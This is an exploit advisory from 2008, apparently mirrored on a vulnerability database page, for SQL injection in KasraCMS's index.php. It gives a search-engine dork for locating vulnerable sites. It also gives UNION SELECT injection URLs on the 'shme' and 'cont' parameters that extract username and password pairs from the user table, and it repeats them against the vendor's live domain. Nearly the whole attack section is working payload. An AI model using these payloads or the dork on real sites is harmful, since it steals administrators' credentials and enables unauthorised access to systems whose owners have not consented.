Lucene search
Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities
Kasra CMS (index.php) SQL Injection Vulnerabilitie
Show more
============================================================
Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities
============================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008
--[ DoRK ]--
intext:"2007-2008 Kasra ICT"
--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>
--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
//ALLAH, forgimme...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# 0day.today [2018-03-16] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo25 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1